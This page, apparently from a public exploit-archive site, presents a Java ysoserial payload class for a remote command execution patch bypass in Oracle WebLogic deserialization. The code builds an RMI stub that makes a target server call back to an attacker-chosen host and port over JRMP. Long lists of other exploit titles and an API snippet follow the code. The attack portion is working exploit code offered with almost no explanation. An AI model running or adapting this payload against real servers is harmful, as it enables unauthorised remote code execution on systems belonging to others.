Menu

Search for hundreds of thousands of exploits

"Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)"

Author

Exploit author

allyshka

Platform

Exploit platform

multiple

Release date

Exploit published date

2019-10-25

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
// All respects goes to Zhiyi Zhang of 360 ESG Codesafe Team
// URL: https://blogs.projectmoon.pw/2018/10/19/Oracle-WebLogic-Two-RCE-Deserialization-Vulnerabilities/
package ysoserial.payloads;

import com.sun.jndi.rmi.registry.ReferenceWrapper_Stub;
import sun.rmi.server.UnicastRef;
import sun.rmi.transport.LiveRef;
import sun.rmi.transport.tcp.TCPEndpoint;
import ysoserial.payloads.annotation.Authors;
import ysoserial.payloads.annotation.PayloadTest;
import ysoserial.payloads.util.PayloadRunner;

import java.lang.reflect.Proxy;
import java.rmi.registry.Registry;
import java.rmi.server.ObjID;
import java.rmi.server.RemoteObjectInvocationHandler;
import java.util.Random;


@SuppressWarnings ( {
    "restriction"
} )
@PayloadTest( harness = "ysoserial.payloads.JRMPReverseConnectSMTest")
@Authors({ Authors.MBECHLER })
public class JRMPClient_20180718_bypass01 extends PayloadRunner implements
ObjectPayload<ReferenceWrapper_Stub> {
    public ReferenceWrapper_Stub getObject ( final String command ) throws Exception {

        String host;
        int port;
        int sep = command.indexOf(':');
        if ( sep < 0 ) {
            port = new Random().nextInt(65535);
            host = command;
        }
        else {
            host = command.substring(0, sep);
            port = Integer.valueOf(command.substring(sep + 1));
        }
        ObjID id = new ObjID(new Random().nextInt());
        TCPEndpoint te = new TCPEndpoint(host, port);
        UnicastRef ref = new UnicastRef(new LiveRef(id, te, false));
        ReferenceWrapper_Stub stud = new ReferenceWrapper_Stub(ref);
        return stud;
    }


    public static void main ( final String[] args ) throws Exception {
        Thread.currentThread().setContextClassLoader(JRMPClient_20180718_bypass01.class.getClassLoader());
        PayloadRunner.run(JRMPClient_20180718_bypass01.class, args);
    }
}
Release DateTitleTypePlatformAuthor
2020-04-03"AIDA64 Engineer 6.20.5300 - 'Report File' filename Buffer Overflow (SEH)"localwindowsHodorsec
2020-04-03"Pandora FMS 7.0NG - 'net_tools.php' Remote Code Execution"webappsphp"Basim Alabdullah"
2020-04-02"DiskBoss 7.7.14 - 'Input Directory' Local Buffer Overflow (PoC)"localwindows"Paras Bhatia"
2020-04-01"DiskBoss 7.7.14 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-04-01"10Strike LANState 9.32 - 'Force Check' Buffer Overflow (SEH)"localwindowsHodorsec
2020-03-31"Redis - Replication Code Execution (Metasploit)"remotelinuxMetasploit
2020-03-31"SharePoint Workflows - XOML Injection (Metasploit)"remotewindowsMetasploit
2020-03-31"Grandstream UCM6200 Series CTI Interface - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-31"Grandstream UCM6200 Series WebSocket 1.0.20.20 - 'user_password' SQL Injection"webappshardware"Jacob Baines"
2020-03-31"FlashFXP 4.2.0 Build 1730 - Denial of Service (PoC)"doswindows"Paras Bhatia"
2020-03-31"DLINK DWL-2600 - Authenticated Remote Command Injection (Metasploit)"remotehardwareMetasploit
2020-03-30"Zen Load Balancer 3.10.1 - Remote Code Execution"webappscgi"Cody Sixteen"
2020-03-30"Microsoft Windows 10 (1903/1909) - 'SMBGhost' SMB3.1.1 'SMB2_COMPRESSION_CAPABILITIES' Local Privilege Escalation"localwindows"Daniel García Gutiérrez"
2020-03-30"Multiple DrayTek Products - Pre-authentication Remote Root Code Execution"remotelinux0xsha
2020-03-30"10-Strike Network Inventory Explorer 9.03 - 'Read from File' Buffer Overflow (SEH)(ROP)"localwindowsHodorsec
2020-03-30"Joomla! com_fabrik 3.9.11 - Directory Traversal"webappsphpqw3rTyTy
2020-03-30"Odin Secure FTP Expert 7.6.3 - 'Site Info' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-27"Jinfornet Jreport 15.6 - Unauthenticated Directory Traversal"webappsjavahongphukt
2020-03-27"rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution"webappsphpvikingfr
2020-03-27"Easy RM to MP3 Converter 2.7.3.700 - 'Input' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-27"ECK Hotel 1.0 - Cross-Site Request Forgery (Add Admin)"webappsphp"Mustafa Emre Gül"
2020-03-27"Everest 5.50.2100 - 'Open File' Denial of Service (PoC)"doswindows"Ivan Marmolejo"
2020-03-26"TP-Link Archer C50 3 - Denial of Service (PoC)"webappshardwarethewhiteh4t
2020-03-26"Centreo 19.10.8 - 'DisplayServiceStatus' Remote Code Execution"webappsphp"Engin Demirbilek"
2020-03-25"10-Strike Network Inventory Explorer 8.54 - 'Add' Local Buffer Overflow (SEH)"localwindows"Felipe Winsnes"
2020-03-25"Joomla! Component GMapFP 3.30 - Arbitrary File Upload"webappsphpThelastVvV
2020-03-25"10-Strike Network Inventory Explorer - 'srvInventoryWebServer' Unquoted Service Path"localwindows"Felipe Winsnes"
2020-03-25"LeptonCMS 4.5.0 - Persistent Cross-Site Scripting"webappsphpSunCSR
2020-03-25"AVAST SecureLine 5.5.522.0 - 'SecureLine' Unquoted Service Path"localwindows"Roberto Piña"
Release DateTitleTypePlatformAuthor
2020-03-31"IBM TM1 / Planning Analytics - Unauthenticated Remote Code Execution (Metasploit)"remotemultipleMetasploit
2020-03-23"FIBARO System Home Center 5.021 - Remote File Include"webappsmultipleLiquidWorm
2020-03-23"CyberArk PSMP 10.9.1 - Policy Restriction Bypass"remotemultiple"LAHBAL Said"
2020-03-18"Broadcom Wi-Fi Devices - 'KR00K Information Disclosure"remotemultiple"Maurizio S"
2020-03-17"ManageEngine Desktop Central - Java Deserialization (Metasploit)"remotemultipleMetasploit
2020-03-17"Microsoft VSCode Python Extension - Code Execution"localmultipleDoyensec
2020-03-09"Counter Strike: GO - '.bsp' Memory Control (PoC)"localmultiple"0day enthusiast"
2020-03-09"Google Chrome 67_ 68 and 69 - Object.create Type Confusion (Metasploit)"remotemultipleMetasploit
2020-03-09"Google Chrome 80 - JSCreate Side-effect Type Confusion (Metasploit)"remotemultipleMetasploit
2020-03-09"Google Chrome 72 and 73 - Array.map Out-of-Bounds Write (Metasploit)"remotemultipleMetasploit
2020-03-05"EyesOfNetwork - AutoDiscovery Target Command Execution (Metasploit)"remotemultipleMetasploit
2020-03-02"Joplin Desktop 1.0.184 - Cross-Site Scripting"webappsmultiple"Javier Olmedo"
2020-03-02"Wing FTP Server 6.2.5 - Privilege Escalation"webappsmultiple"Cary Hooper"
2020-02-28"qdPM < 9.1 - Remote Code Execution"webappsmultiple"Tobin Shields"
2020-02-24"Real Web Pentesting Tutorial Step by Step - [Persian]"webappsmultiple"Meisam Monsef"
2020-02-20"Apache Tomcat - AJP 'Ghostcat File Read/Inclusion"webappsmultipleYDHCUI
2020-02-10"iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()"dosmultiple"Google Security Research"
2020-02-10"Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting"webappsmultiple"Prasenjit Kanti Paul"
2020-02-07"Google Invisible RECAPTCHA 3 - Spoof Bypass"webappsmultipleMatamorphosis
2020-02-03"Cacti 1.2.8 - Unauthenticated Remote Code Execution"webappsmultipleAskar
2020-02-03"Cacti 1.2.8 - Authenticated Remote Code Execution"webappsmultipleAskar
2020-01-28"macOS/iOS ImageIO - Heap Corruption when Processing Malformed TIFF Image"dosmultiple"Google Security Research"
2020-01-22"KeePass 2.44 - Denial of Service (PoC)"dosmultiple"Mustafa Emre Gül"
2020-01-16"Tautulli 2.1.9 - Denial of Service ( Metasploit )"webappsmultiple"Ismail Tasdelen"
2020-01-16"SunOS 5.10 Generic_147148-26 - Local Privilege Escalation"localmultiple"Marco Ivaldi"
2020-01-16"Citrix Application Delivery Controller (ADC) and Gateway 13.0 - Path Traversal"webappsmultiple"Dhiraj Mishra"
2020-01-13"Citrix Application Delivery Controller and Gateway 10.5 - Remote Code Execution (Metasploit)"webappsmultiplemekhalleh
2020-01-11"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution (PoC)"webappsmultiple"Project Zero India"
2020-01-11"Citrix Application Delivery Controller and Citrix Gateway - Remote Code Execution"webappsmultipleTrustedSec
2020-01-01"nostromo 1.9.6 - Remote Code Execution"remotemultipleKr0ff
Release DateTitleTypePlatformAuthor
2019-10-25"Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass)"remotemultipleallyshka
2019-03-01"WordPress Core 5.0 - Remote Code Execution"webappsphpallyshka
2018-12-12"phpBB 3.2.3 - Remote Code Execution"webappsphpallyshka
2018-03-28"TeamCity < 9.0.2 - Disabled Registration Bypass"remotemultipleallyshka
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/46513/?format=json')

For full documentation follow the link above

Cipherscan. A very simple way to find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Browse exploit APIBrowse